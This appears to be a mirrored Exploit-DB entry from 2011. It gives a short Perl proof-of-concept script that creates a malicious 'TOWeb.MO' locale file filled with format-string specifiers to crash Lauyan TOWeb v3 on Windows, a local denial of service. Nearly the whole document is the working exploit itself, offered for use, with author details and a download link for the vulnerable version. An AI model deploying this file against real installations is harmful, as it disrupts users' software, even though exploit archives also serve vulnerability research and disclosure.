TOWeb 3.0 – Local Format String Denial of Service ‘TOWeb.MO’ File Corruption

  • 作者: BSOD Digital
    日期: 2011-09-05
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/17785/
  • #
    #Exploit Title:
    #TOWeb V3 Local Format String DOS Exploit (TOWeb.MO file corruption)
    #
    #Date: 05/09/2011
    #
    #Author: BSOD Digital (Fabien DROMAS)
    #Mail: bsoddigital@gmail.com
    #
    #
    #Test:
    #OS: Windows 7
    #Versions: V3.17
    #
    #Path:
    #Lauyan\TOWeb V3\locale\fr\LC_MESSAGES\TOWeb.MO
    #
    #Link:
    #http://www.lauyan.com/download/old/install-towebv3-fr.exe
    #
    #!/usr/bin/perl
    
    print "\n------------------------------------";
    print "\nLauyan TOWeb v3 Local Format String Dos Exploit";
    print "\nBSOD Digital - bsoddigital@gmail.com";
    print "\n------------------------------------";
    my $file = "TOWeb.MO";
    my $corrupt = "%s" x 2;
    open($File, ">$file");
    print $File $corrupt;
    print "\nEvil TOWeb.MO file created.";
    close($File);